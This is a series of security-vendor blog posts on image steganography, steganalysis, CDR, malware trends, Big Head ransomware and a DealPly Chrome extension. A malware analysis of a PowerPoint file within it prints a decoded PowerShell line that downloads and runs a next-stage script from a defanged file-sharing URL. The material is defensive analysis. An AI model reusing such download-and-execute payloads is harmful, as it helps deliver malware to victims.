Target: Consumers

Tags:  Content Disarm and Reconstruction (CDR), Malware, Images, Steganography, Zero-Trust

In our initial blog post, we explored the technique employed by malware authors to hide malicious code within images, known as steganography. In this blog, we will focus on advanced detection tools designed named steganalysis. We will delve into the limitations of these tools and explore how the innovative approach of zero-trust Content Disarm and Reconstruction (CDR) prevention can address these challenges. Our upcoming blog (Part-3) will provide insights into reverse engineering evasive malware discovered within images.

Steganalysis refers to the field of study and techniques used to detect the presence of hidden information within digital media, such as images, audio files, or videos, that has been concealed through steganography. Steganography involves the covert embedding of data within a carrier medium, making it imperceptible to casual observers. Steganalysis aims to uncover and analyze the hidden data, identify the steganographic algorithms or methods used, and determine if a given media file contains hidden information. It involves the application of statistical analysis, signal processing, machine learning, and other computational methods to reveal the presence of steganography and distinguish between innocent media and steganographic content. Steganalysis plays a crucial role in digital forensics, security, and counterintelligence, providing means to detect covert communication and potential malicious activities.

Steganalysis Methods

Muralidharan et al [1] provided detailed survey about state-of-the-art image steganalysis. We can divide steganalysis two three categories:

1. Statistical Analysis: Statistical analysis is a fundamental approach in steganalysis. It involves analyzing the statistical properties of images to detect hidden information. Common techniques include histogram analysis, spatial domain analysis, and frequency domain analysis [4].
2. Machine Learning-Based Methods: With the advent of machine learning algorithms, steganalysis has witnessed significant advancements. Various machine learning models, such as support vector machines (SVM), artificial neural networks (ANN), and deep learning architectures, have been applied to steganalysis tasks. These models learn from a vast amount of data and can detect subtle patterns indicative of steganography.
3. Rich Model Features: Steganalysis methods can leverage rich model features to enhance detection accuracy. These features encompass higher-level image characteristics, such as texture, color, and spatial relationships. By extracting and analyzing these features, steganalysis algorithms can effectively distinguish between regular and steganographic images.

However, steganalysis is far from being perfect and the following limitations exists:

1. Single Dataset Limitation: Many steganalysis methods are created, tested, and utilized only on a single dataset [1]. This can lead to a lack of versatility, potentially limiting the effectiveness of these methods when faced with different datasets. The methods might fail to generalize well across diverse scenarios and image collections, which may affect their real-world applicability.
2. Specificity of Targeted Steganography Schemes: The paper [1] points out that many steganalysis methods seem to target only specific steganography schemes. This means that while they might be effective in detecting and analyzing certain steganographic methods, they might be inefficient or entirely ineffective against others. This narrow focus might limit the overall effectiveness of such steganalysis methods.
3. Difficulty with Advanced Steganography Methods: The paper [1] highlights that some steganography techniques, such as coverless and Generative Adversarial Networks (GAN) based steganography, are not adequately countered by current steganalysis methods. These more advanced methods present a significant challenge for steganalysis, indicating that the field may struggle to keep pace with the evolution of steganography techniques.
4. High Embedding Rates: Steganography techniques that employ a high embedding rate can pose challenges for steganalysis. When a large amount of data is hidden within an image, it becomes more difficult to detect the presence of hidden information. Steganalysis algorithms may struggle to differentiate between legitimate image noise and the embedded data. Especially if the original image is unknown.
5. Adaptive Steganography: Adaptive steganography techniques dynamically adjust the embedding process based on specific image characteristics. These methods can evade traditional steganalysis methods by exploiting vulnerabilities in the detection algorithms. As a result, detecting adaptive steganography becomes a daunting task for steganalysis systems.
6. Low-Bit Attacks: Attackers employing low-bit steganography techniques embed a minimal amount of data into the cover image. This method aims to stay below the detection threshold of steganalysis algorithms, making the hidden information less noticeable. Steganalysis methods optimized for higher embedding rates may fail to detect such subtle alterations, rendering them ineffective against low-bit attacks.

Steganalysis is a trust-based detection solution and based on the drawbacks evasive malware can bypass steganalysis. As a result, a zero-trust prevention based on CDR is needed.

How Image Content Disarm and Reconstruction Works?

A recent study [2] examines an alternative approach for neutralizing steganography and malware attacks within images. Our method shares similarities and relies on transcoding.

Image transcoding involves converting an image file from one format to another, which may entail modifying the resolution, color depth, and format of the image data. In the broader context of digital media, transcoding refers to the direct conversion of encoding between different formats [2].

Transcoding is typically performed when the target device lacks support for the original image format or has limited storage capacity, necessitating a reduction in file size [2]. For instance, a high-resolution JPEG file might be transcoded into a lower resolution PNG file for improved website loading speed due to its smaller file size.

The process of image transcoding consists of two steps. Initially, the original data is decoded into an intermediate uncompressed format, after which it is encoded into the desired target format. This transcoding process can be either lossy or lossless. In lossy transcoding, certain information is lost during the conversion, resulting in a potential degradation of image quality. This method is commonly employed when the target device has limited storage capacity. Conversely, lossless transcoding retains all information and preserves image quality [2]. Typically, scaling modifications are utilized during transcoding.

It is important to note that transcoding differs from compression and trans-muxing/rewrapping. Compression involves reducing file size without altering the format, while trans-muxing/rewrapping changes the container format while keeping the data intact [2].

In summary, image transcoding plays a vital role in modern digital workflows by facilitating the conversion of images to the most suitable format for their intended use. It enables consistent viewing of image content across a diverse range of devices with varying capabilities and constraints [2].

Image Content Disarm and Reconstruction (CDR) employs transcoding and scaling techniques to fortify image files against evasive steganography and concealed metadata. This approach generates a new image file with a different format, devoid of metadata and extraneous information. The transcoded file can later be converted back to the original format. Transcoding has been proven as a secure measure against malware attacks [2].

Summary

The prevalence of steganography attacks is escalating [3], and present detection methodologies exhibit notable limitations. Consequently, Content Disarm and Reconstruction (CDR) emerges as a dependable solution, assuring absolute security without substantial visual alterations [1]. Therefore, integrating CDR into your security infrastructure merits consideration.

Pictorially, the images below represent a ‘before’ and ‘after’ application of CDR, with the former on the right and the latter on the left. It is discernible that there are no visual discrepancies perceptible to the naked eye.

To encapsulate, adopting a zero-trust approach to file prevention demonstrates remarkable efficiency and efficacy in countering elusive threats that traditional detection methods may overlook.

In the next blog we will reverse engineer malicious images.

References

[1] Muralidharan, T., Cohen, A., Cohen, A., & Nissim, N. (2022). The infinite race between steganography and steganalysis in images. Signal Processing, 108711.‏

[2] Eli Belkind and Ran Dubin and Amit Dvir, Open Image Content Disarm and Reconstruction}, 2023, https://arxiv.org/abs/2307.14057ץ

[3] Security Boulevard, Steganography in Cybersecurity: A Growing Attack Vector,

https://securityboulevard.com/2022/05/steganography-in-cybersecurity-a-growing-attack-vector/

[4] Muralidharan, Trivikram, et al. “The infinite race between steganography and steganalysis in images.” Signal Processing (2022): 108711.‏

Target: Consumers

Tags:  Content Disarm and Reconstruction (CDR), Malware, Isolation, Safe Workspace^®, Zero-Trust

Several interesting trends were highlighted in the recent VirusTotal Malware Trends Report for July 2023. The report highlighted a notable increase in the number of malicious files attached to emails from March to April 2023 [1]. The growing utilization of popular formats like OneNote and JavaScript alongside HTML for malicious purposes is an emerging concern.

One trend in this landscape has been the spike in suspicious PDF files linked to malicious campaigns over the past two years. These PDF files serve different purposes, such as exploiting vulnerabilities or phishing, with the latter being more common [1]. However, OneNote has emerged as a popular format for distributing malware through email attachments in 2023. It became the fastest-growing format for malicious attachments that year, presenting a significant shift in cybercriminal tactics [1].

A common technique with malicious OneNote files is embedding a malicious file (VBA, HTML +java script, PowerShell, or a combination of them), attempting to persuade the victim to enable execution. Security vendors have made strides in their detection capabilities for this format, with antivirus detection improving significantly after the first half of February 2023 [1].

Another prominent trend has been the increased use of JavaScript distributed alongside HTML in sophisticated phishing attacks. These attacks are designed to steal victims’ credentials. In light of these trends, traditional formats like Excel, RTF, CAB, compressed formats, and Word have declined in popularity as malicious attachments [1].

It’s important to mention that ISO files are emerging as a flexible alternative for both widespread and targeted attacks, making them difficult to scan by some security solutions due to heavy compression. These ISO files are often disguised as legitimate installation packages for various software, making them a challenging threat.

The malware landscape in 2023 has seen the rise of unconventional methods for malware delivery, mainly through OneNote and JavaScript attachments, while traditional formats are becoming less popular. Security practitioners should take note of these trends and adjust their defensive strategies accordingly. We at BUFFERZONE® believe in application isolation, and Content disarm and Reconstruction (CDR).

BUFFERZONE® Safe Workspace^®

BUFFERZONE Safe Workspace^® is a suite of prevention capabilities based on application isolation technology that includes Safe Browsing, SafeBridge® (Content Disarm and Reconstruction capabilities), and Safe Removable (USB attack prevention), all combined with clipboard security. Safe Workspace^® virtual container is created by a kernel driver, which virtually separates the operating system into two logical zones. The first zone is the trusted zone, which is connected to all the organization’s networks and the operating system’s files. The second zone is called the untrusted zone, which acts as a buffer zone where different applications can securely run isolated from the trusted zone’s memory, files, registry, and processes. This method offers advantages such as low CPU and memory footprint, high quality of experience, and the ability to seamlessly work inside the virtual container without noticing that you are protected from browsing and USB threats. BUFFERZONE® is the only virtual containment solution based on six patented technologies.

By using an advanced isolation solution, the organization’s content is secure. Downloaded attachments are isolated, while antivirus and EDR (Endpoint Detection and Response) solutions can always scan the untrusted virtual zone. The virtual environment can be cleaned in one click, eliminating malicious traces. Ransomware will not be able to run and attack the endpoint. BUFFERZONE CDR technology prevents evasive file-based malware attacks such as OneNote [2].

References

[1] VICENTE DÍAZ, VirusTotal Malware Trends Report: Emerging Formats and Delivery Techniques, https://blog.virustotal.com/2023/07/virustotal-malware-trends-report.html

[2] BUFFERZONE Security, OneNote Malware Attack Prevention Using Content Disarm and Reconstruction, https://bufferzonesecurity.com/onenote-malware-attack-prevention-using-content-disarm-and-reconstruction/

Target: Consumers

Tags:  Content Disarm and Reconstruction (CDR), Malware, Images, Steganography, Zero-Trust

Throughout this blog series, we will delve into the following topics: understanding steganography (part 1), exploring steganalysis and enhancing prevention techniques (part 2), and unraveling the process of disarming and reversing malicious malware concealed within image metadata (part 3).

Image steganography is a technique that can hide evasive code in plain sight, such as within an image file. The practice of concealing messages or information within another non-secret text or data, referred to as the “carrier,” allows malicious actors to compromise devices just by hosting an image on a website or sending an image via email [1].

This process becomes particularly effective as digital images are merely streams of bytes, like any other file. As a result, they become an excellent medium for concealing secret text and other data. When people open a picture on a device, they seldom look beyond the visual presentation displayed to see what lies hidden inside the image file format [1].

One simple method of image steganography is appending a string to the end of the file or inside the image metadata information. This action does not prevent the image from being displayed normally nor change its visual appearance. For example, appending “hello world” to the end of the file does not alter the image, but the output from the hex dump shows the extra bytes added. A program can easily read the plain text string [1].

In more complex methods, malware can be injected into digital photos that appear to be perfectly normal, a process known as steganography. The technique takes advantage of the hidden data that comes with an image, which is not necessarily translated into pixels on your screen. Malware code can be embedded in an image in many ways, including attaching it to the end of a file, tweaking individual bits of the code, or changing the metadata associated with the file [1].

However, injecting malware into an image is not as simple as it may first seem. There are two main challenges:

• Image Distribution: Steganography in digital media often requires subtly manipulating the image’s pixels or metadata to encode the malicious code. This manipulation is not visually perceptible to the human eye but can cause havoc when decoded by the machine. Yet, this process becomes even more challenging when sharing these manipulated media files via social media networks. These platforms often resize, recompress, strip metadata, and sometimes crop or color-correct images. These manipulations restructure the image and may disarm the attack, challenging the attackers [1].

• Execution: Although image files carry malware, they cannot automatically infect the system when opened. The exploitation occurs when there is a software vulnerability that the hidden malicious code can exploit, or the user enables an embedded macro that triggers the malware. For example, please review our previous blog about

Therefore, while image steganography serves as a potential medium for malware delivery, the complexity of execution and the need for certain user actions or system vulnerabilities make it challenging as an attack vector; however, from recent attacks, we see malware steganography on the rise [2].

How Steganography Attack Works:

Steganography is the process of concealing secret information within an ordinary, non-secret file or message to avoid detection. The two most common image steganography methods are the Least Significant Bit (LSB) method and the method based on style transfer.

1. Least Significant Bit (LSB) Method

The Least Significant Bit (LSB) method is the most common and simplest form of image steganography. This method involves altering the least significant bit of the pixel values in a digital image. In this process, the cover image is selected, and the least significant bits of the pixel values are replaced with the bits from the secret data.

The basic idea behind the LSB method is that changes to the least significant bits of the pixel values will have a minimal effect on the color and appearance of the image. This makes the alterations to the image hard to detect for the human eye.

The LSB method can be used with diverse types of images, including grayscale, colored, and true color images. The data size that can be hidden using this method depends on the size and the type of the image. For further reading about state-of-the-art LSB steganography attacks please find this paper by Liu et al [3].

2. Image Steganography based on Style Transfer

Recently, a novel approach to image steganography has been proposed which makes use of neural networks and style transfer techniques. Style transfer is a process that manipulates a digital image or video to adopt the visual style of another image.

In this method, the secret message is embedded into the cover image while the image’s style is being transformed. The secret information is integrated into the latent representation of the cover image to generate the steganography images. The steganography images generated this way are indistinguishable from normal stylized images. This method leverages the power of neural networks and takes advantage of the complex transformations involved in style transfer to hide the secret message [4].

The two methods have their advantages and disadvantages. The LSB method is simple and easy to implement but can be vulnerable to steganalysis techniques if not done properly. On the other hand, the style transfer-based method can provide high security, but it requires more computational resources and a deeper understanding of neural networks and style transfer techniques.

Summary

To sum up, image steganography serves as a valuable and invisible asset for threat actors for ensuring secure and concealed communication or hiding malicious code. Given the progress made in technology and the emergence of advanced techniques such as style transfer-based steganography, the future of image steganography appears promising and remains an essential field of study [4] and it use by threat actors is on the rise.

In our upcoming blog post, we will explore the concept of steganalysis (the detection of steganography) and its inherent limitations. Furthermore, we will present Content Disarm and Reconstruction as a potential solution to overcome these limitations.

References

[1] Ran Dubin Image steganography (TODO – add link)

[2] Security Boulevard, Steganography in Cybersecurity: A Growing Attack Vector

https://securityboulevard.com/2022/05/steganography-in-cybersecurity-a-growing-attack-vector/

[3] J. Liu et al., “Recent Advances of Image Steganography with Generative Adversarial Networks,” in IEEE Access, vol. 8, pp. 60575-60597, 2020, doi: 10.1109/ACCESS.2020.2983175.

[4] Hu, Donghui, et al. “Image Steganography based on Style Transfer.” arXiv preprint arXiv:2203.04500 (2022).

[5] https://arxiv.org/pdf/2307.14057.pdf‏

Target: Cybersecurity specialist

Tags: OLE, PowerPoint, Excel, Word, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering.

In the second section, we introduced a fundamental approach to reverse-engineering a harmful OLE file, concentrating
on a malicious PowerPoint document associated with a threat dubbed as Valyria or RevengeRat (Link to file).
This malware manipulates PowerPoint by embedding a malignant VBA script which leverages P-Code encoding to
obfuscate a harmful PowerShell script, thereby evading detection mechanisms. The obfuscated PowerShell script
facilitates the download of the next phase of the attack, which intriguingly takes the form of a PowerShell script
masquerading as an image file. In this blog we will continue the first part and use the same methodology.

OLE PowerPoint Research

In this blog we will investigate sha256:
0562a2df06412fc0038afca2d27c4b1428681a518015cd2fd823df9b55db21f9

Threat Intelligence:
The first stage will be reviewing the file in VirusTotal to get reputation and information about the file.

We can observe that the file is detected as malicious by 36 engines and the popular threat is trojan type:
trojan.valyria/mrair

Dynamic Analysis:

From viewing the file in a VMRAY sandbox environment (Link ) we can observe that the sandbox failed to load the
preview image. But in the background the malware was active and started executing malicious activity and running
malicious PowerShell script.

Now let us do the same based on static analysis.

Static Analysis:

We will initiate our analysis using oleid, a script specifically designed to scrutinize OLE files. It can identify
distinctive attributes associated with malicious files.

After running oleid <file>:

The oleid analysis reveals the presence of a VBA macro within our system, with the additional detail that it contains
certain suspicious keywords.
As a result, we will be executing the olevba <file> command.

The output uncovers pertinent details regarding the VBA macro detected. We can observe that we have Auto_Open
that is able to automatically execute. The Run keyword means that the file may run executable or script (as in our use case)
and there are hex strings, Base64 encoded information and VBA Stomping.

VBA Stomping is an evasion tactic employed by malware creators to sidestep anti-virus software detection.
It revolves around modifying a VBA (Visual Basic for Applications) macro within a Microsoft Office document,
usually Word or Excel, to conceal malicious instructions.

The term “stomping” originates from the action of overriding or ‘stomping’ on the p-code (a form of pre-compiled
VBA instruction set) with a harmless or benign version, while maintaining the malevolent code in the VBA source code.
The catch here is that many antivirus programs only scrutinize the p-code, not the source code. Consequently, these
programs only perceive the innocuous p-code and overlook the harmful source code.

Nonetheless, when the manipulated document is accessed, Microsoft Office executes the source code instead of the
p-code if they differ, triggering the concealed harmful code.

Olevba reveals both the macro and its corresponding P-code parsing. The VBA macro identified in the document is
named ‘WXhI’. It is important to note that the macro begins with Auto_Open(). However, for brevity, only the significant
parts of the document are displayed here.

We can observe that the file contains obfuscated code (rB) that is equal to string combination
“-e” and Based64 string encoded.

If we decode:

If we decode the base64 we will get:

I EX   (@)     (N)ew-OBIject    .DownloadStream.Invoke (‘
\x0Ahhttps://dc4444[.]4sync[.]com/dc4444.syncom/download/yeAL1jE1My4xNZuMJI
\x0Algfpa=”40\x0A\n’)\n \nIwSAXpvztnDYuFSFEEOaRLv dIePGy iIBh aXsOSkbWbySEbwcZFY\n'[

Our analysis reveals that the content primarily consists of ‘DownloadStream.Invoke’ alongside a URL, with ‘DownloadStream’ being a PowerShell command utilized to download content. Upon examining the reputation score from VirusTotal, it becomes evident that the URL is malicious, employed to download an additional PowerShell script. However, the code in its current state is unable to execute independently as it has been obfuscated by P-code and the higher level join the base64 code with the p-code transform data:

In this example, the term ‘XQMcRk’ corresponds to the letter ‘p’, while ‘FeaU’ maps to the letter ‘o’. This pattern is further illustrated in the following figure:

To summarize this part of our research, P-code can be used to obscure the malicious intent of a file, serving as another evasion technique to bypass detection. While this form of attack is not novel, it continues to be prevalently utilized in real-world scenarios.

How can we stop this attack?

Content Disarm and Reconstruction (CDR) is a proactive file security approach that embodies a zero-trust philosophy.
Rather than depending on threat detection, CDR concentrates on prevention.
It sanitizes each potential attack vector within a file, ensuring it is safe to use. We invite you to visit our blog for more
insights on this topic.

Following the CDR process, the file’s malicious elements are effectively eliminated.
The Visual Basic for Applications (VBA) content, identified as a high-risk attack vector, is automatically removed,
thus rendering the file safe for usage. When we run BUFFERZONE CDR against the file we will receive the following
Oleid output without the malicious VBA scripts.

Consequently, CDR (Content Disarm and Reconstruction) serves as an exceptionally effective preventive measure.
However, should you need to access the original file without neutralizing it, BUFFERZONE® Safe Workspace™ provides
an ideal solution. BUFFERZONE isolates untrusted files within a secure virtual container, enabling users to open them securely. For additional details about BUFFERZONE Isolation, we encourage you to read our latest blog post on the subject.

References

[1] Object Linking and Embedding (OLE) Data Structures, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/85583d21-c1cf-4afe-a35f-d6701c5fbb6f

[2] File format reference for Word, Excel, and PowerPoint, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

[3] Component Object Model (COM), https://learn.microsoft.com/en-us/windows/win32/com/component-object-model–com–portal

[4] OleTools, https://github.com/decalage2/oletools

Target: IT Professionals

Tags: Malware, Ransomware Zero-Trust

Ransomware remains a significant cybersecurity concern, posing threats to personal and enterprise data. The Big Head Ransomware is a new entrant into the cyber-crime scene, which surfaced in May 2023. With its unique propagation methods and encryption techniques, Big Head Ransomware is causing ripples in the cybersecurity industry. This blog post aims to illuminate this malware’s operations, variants, and potential consequences and present a simple, cost-effective way to protect your organization.

Three distinct variants of the Big Head Ransomware have been identified, each featuring the same contact email within their ransom instructions. This strongly suggests a common origin tied to a single malware developer [1]. This ransomware strain is under scrutiny and propagated through deceptive online advertising practices, often in the guise of bogus Windows updates and fraudulent Word installers [1]. By exploiting the naive trust of unsuspecting users, the perpetrator effectively lures victims into downloading and launching harmful software.

Big Head operates as a .NET binary ransomware. Upon activation, it triggers a sequence of actions, including establishing a registry autorun key, overwriting existing files if necessary, setting system file attributes, and deactivating the Task Manager [1]. For each victim, it generates a unique ID, eradicates shadow copies to impede straightforward system recovery, and encrypts target files, appending a “.poop” extension to the filenames. Unique to Big Head, it deploys three AES-encrypted files, each having a specific function:

• Propagation: An executable that drops a copy of itself for further spread.
• Communication: A Telegram bot was created to communicate with the threat actor’s chatbot ID.
• Deception and Encryption: Another executable file masks itself as a Windows update while it encrypts the user’s files and encodes file names to Base64 [1]

Moreover, Big Head Ransomware uses a clever evasion technique: it displays a screen mimicking a legitimate Windows update during the encryption process.

Big Head has three known variants, each exhibiting different behaviors and routines.

• The first variant employs a .NET compiled binary file, which has a list of configurations related to the installation process, such as creating a registry key, checking the existence of a file, and overwriting it if necessary, setting system file attributes, and creating an autorun registry entry [1].
• The second variant maintains ransomware capabilities and incorporates stealer behavior with functions to collect and exfiltrate sensitive data from the victim system. The stolen data can include browsing history, a list of directories, installed drivers, running processes, product keys, and active networks, and it can also capture screenshots [2].
• The third variant identified by Trend Micro introduces a file infector named “Neshta,” which inserts malicious code into executables on the breached system. It is speculated that this could be an attempt to evade detection that relies on signature-based mechanisms [2].

While Big Head Ransomware’s encryption methods are standard and its evasion techniques are easy to detect, it is important not to underestimate its potential damage. Its deceptive methods, like displaying a fake Windows update screen and disseminating via malvertising, can trick less cybersecurity-savvy individuals. As Big Head Ransomware continues to evolve, the creators are actively experimenting with different approaches to optimize their attacks. Big Head joins the increasing number of new Ransomware malware like Cl0p [3], LockBit [4], and BlackBasta [5] that have gained increasing popularity in the recent few months.

What can we do?

Stay vigilant and adhere to basic cybersecurity practices, such as avoiding suspicious links and downloads, updating your software regularly, and maintaining reliable backups to combat such threats.

A simpler and more effective solution is needed since detection is insufficient, and the human factor may bypass protection paradigms™. This is why we created BUFFERZONE® Safe Workspace^®.

BUFFERZONE Safe Workspace^® is a suite of prevention capabilities based on application isolation technology that includes Safe Browsing, SafeBridge® (Content Disarm and Reconstruction capabilities), and Safe Removable (USB attack prevention), all combined with clipboard security. Safe Workspace^® virtual container is created by a kernel driver, which virtually separates the operating system into two logical zones. The first zone is the trusted zone, which is connected to all the organization’s networks and the operating system’s files. The second zone is called the untrusted zone, which acts as a buffer zone where different applications can securely run isolated from the trusted zone’s memory, files, registry, and processes. This method offers advantages such as low CPU and memory footprint, high quality of experience, and the ability to seamlessly work inside the virtual container without noticing that you are protected from browsing and USB threats. BUFFERZONE® is the only virtual containment solution that works based on six patented technologies.

By using an advanced isolation solution, the organization’s content is secure. Downloaded attachments are isolated, while antivirus and EDR (Endpoint Detection and Response) solutions can always scan the untrusted virtual zone. The virtual environment can be cleaned in one click, eliminating any malicious traces. Ransomware will not be able to run and attack the endpoint.

Try it now!

References:

[1] Bill Toulas, New ‘Big Head’ ransomware displays fake Windows update alert, https://www.bleepingcomputer.com/news/security/new-big-head-ransomware-displays-fake-windows-update-alert/

[2] Ieriz Nicolle Gonzalez, Katherine Casona, Sarah Pearl Camiling, Tailing Big Head Ransomware’s Variants, Tactics, and Impact,  https://www.trendmicro.com/en_au/research/23/g/tailing-big-head-ransomware-variants-tactics-and-impact.html

[3] CISA, CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a

[4] CISA, LockBit 3.0, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

[5] Sergiu Gatlan , US govt contractor ABB confirms ransomware attack, data theft,

https://www.bleepingcomputer.com/news/security/us-govt-contractor-abb-confirms-ransomware-attack-data-theft/

Target: Cybersecurity specialist

Tags: CRX, Chrome Extension, Malware, Reverse Engineering.

A Chrome extension is a small software program that enhances the functionality of the Google Chrome browser. Extensions are made using web technologies such as HTML, JavaScript, and CSS and are designed to make the browsing experience more efficient and enjoyable.

Some extensions provide utility features like ad-blocking, language translation, password management, or note taking. Others can change the appearance of your browser, provide quick access to certain websites, or enable more advanced features like developer tools

While Chrome extensions can provide a lot of utility and enhance your browsing experience, they can also pose certain security risks if not used carefully:

1. Malicious Extensions: Some extensions can be malicious, either because they were designed that way, or because they were once benign but were later bought and modified by malicious parties. These extensions can steal your personal data, inject ads into websites you visit, or even install malware on your device.
2. Overly Broad Permissions: Chrome extensions need certain permissions to function, but some might ask for more permissions than they need. Granting these permissions can give the extensions access to your browsing data, personal information, or even control over all the pages you visit.
3. Data Breaches: Even if an extension is not deliberately malicious, it might still be a security risk if its developers do not follow best practices for data security. If the extension collects or transmits sensitive information and it does not do so securely, that information could be at risk.
4. Lack of Updates: If extensions are not regularly updated, they may become susceptible to known security vulnerabilities over time.

Several high-profile attacks were generated throw Chrome extensions recently:

1. Wide-scale theft and redirection attack: More than two dozen browser extensions, primarily designed as video downloaders, were found to steal personal information, redirect users to ads or phishing websites, and even install malware. This large-scale attack impacted about 3 million users. The extensions exhibited malicious behavior days after installation, making it difficult for security software to discover. They also logged every link a user clicked, sent that information to remote servers, and collected personal data. In some cases, these extensions could download further malware onto a user’s PC [1].
2. Malicious extension installation via compromised systems: In some cases, malicious extensions were installed by adversaries who had already compromised a system. Once installed, these extensions could browse websites in the background, steal all the information a user entered into a browser, and be used as an installer for a RAT (Remote Access Trojan) for persistence. There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions [2].
3. ChromeLoader/Shampoo attack: The ChromeLoader campaign used a malicious extension called “Shampoo,” which tricked victims (primarily users of movie and video game pirating websites) into installing it. This extension redirected users’ search queries to malicious websites. The malware was designed to relaunch itself via the Task Scheduler on victims’ machines every 50 minutes, making it challenging to get rid of due to multiple persistence mechanisms. The extension was heavily obfuscated and contained many anti-debugging and anti-analysis traps [3].

How to mitigate the risk?

It is recommended to only install extensions from trusted sources (preferably the Chrome Web Store), to carefully review the permissions that an extension asks for, and to keep extensions updated. Also, regularly review and remove any extensions that you no longer use. Using security software that includes an internet security component can also help to alert you to potential threats.

Chrome extension research

In this blog we will use ExtAnalysis [4] is a Chrome extension analysis framework that can perform the following actions:

• Download & analyze extensions: This includes extensions from the Chrome Web Store, Firefox Addons, and installed extensions of Google Chrome, Mozilla Firefox, and (in the future) the Opera Browser. Extensions in the formats of .crx, .xpi, and .zip can be uploaded and scanned.
• View basic information: Such as Name, Author, Description, and Version of the extension. It also allows you to view the manifest and detailed permission information.
• Extract threat intelligence from files: This includes URLs, domains, IPv6 and IPv4 addresses, Bitcoin addresses, Email addresses, file comments, and Base64 encoded strings.
• View and edit files: You can view and edit HTML, JSON, JavaScript, and CSS files.
• VirusTotal scans: This tool can perform VirusTotal Scans for URLs, Domains, and Files, and it can also conduct a RetireJS Vulnerability scan for JavaScript files.
• Reconnaissance tools: It provides tools for Whois Scan, HTTP headers viewer, URL Source viewer, and GEO-IP location for extracted URLs.
• Graph insights: View the entire extension files and URL relationships.

In this article, we delve into an investigation of DealPly adware with the MD5 hash value: 38a7b26c02de9b35561806ee57d61438. Typically, users install Chrome extensions inadvertently while downloading pirated content from disreputable websites [5]. Upon installation, this extension modifies the browser’s homepage, supplants the default search engine, and analyses user search queries to produce more customized ads. When we decompress the Chrome extension, the file “AmpSearchServiceLocalList.json” reveals the primary keyword logic. Employing the ExtAnalysis platform’s graph feature, we can visually represent the full connection layout:

And the Json and the webpages related to him:

The red square is the JSON file with multiple related website links that the “new” search engine refers to.

Upon examining the manifest.json of the Chrome extension, we noticed an aberration: the “UPDATE_URL” path indicates that the extension does not follow Google Chrome webstore’s standard update mechanism. Instead, it uses an update link from a suspicious website, “juwakaha.com”. This deviates from the usual path, which is typically “https://clients2.google.com/service/update2/crx”. This discrepancy serves as a red flag, suggesting that the latest updates are not undergoing Google’s validation process, but are being updated by the questionable website. This circumstance aligns with the fact that the extension is being updated externally, beyond the purview of the official marketplace.

When we turn to validate the Chrome extension permission, we can see that:

Upon analysis, it becomes apparent that the extension possesses the capability to modify all data on websites during any browsing session, gain access to cookies, and utilize the Chrome.WebRequest API. While not every application exhibiting such permissions is necessarily malicious, their presence is cause for concern and warrants further scrutiny.

Summary

In this article, we apply static analysis to a Chrome extension using the ExtAnalysis platform. We illustrate how inspecting the extension’s manifest, assessing its permissions, and understanding its network graph can streamline our investigation and provide crucial insights. These initial procedures serve as an excellent foundation before we delve into the more intricate task of analyzing the JavaScript code.

We hope you enjoyed this blog.
Try us now!

References:

[1] Paul Wagenseil, Malicious Chrome and Edge extensions infect at least 3 million people — what to do,  https://www.tomsguide.com/news/28-bad-browser-extensions.

[2] MITRE, Browser Extension, https://attack.mitre.org/techniques/T1176/

[3] Craig Hale ,This malicious Google Chrome extension could hijack your devices if you try and download pirate movies, https://www.techradar.com/news/this-malicious-google-chrome-extension-could-hijack-your-devices-if-you-try-and-download-pirate-movies

[4] Tuhinshubhra , Chrome Extension analysis framework, https://github.com/Tuhinshubhra/ExtAnalysis

[5] KASPERSKY , Threat in your browser: what dangers innocent-looking extensions hold for users, https://securelist.com/threat-in-your-browser-extensions/107181/